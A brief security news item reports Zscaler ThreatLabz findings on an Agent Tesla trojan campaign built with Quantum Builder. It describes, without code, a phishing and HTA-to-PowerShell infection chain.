Zscaler ThreatLabz researchers discovered that the Agent Tesla remote access trojan is being spread using Quantum Builder in a new malware campaign involving LNK files, The Hacker News reports.
Spear-phishing emails purporting to be from a Chinese sugar supplier, which include a GZIP attachment that eventually triggers the launch of a remote HTML application, commence the attack, with the HTA file prompting the decryption and execution of a separate PowerShell script that then retrieves Agent Tesla, the report showed. Meanwhile, the second infection sequence variant involving a ZIP, instead of a GZIP file, was found to have use more obfuscation techniques to conceal malicious activity.
"Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations," said researchers.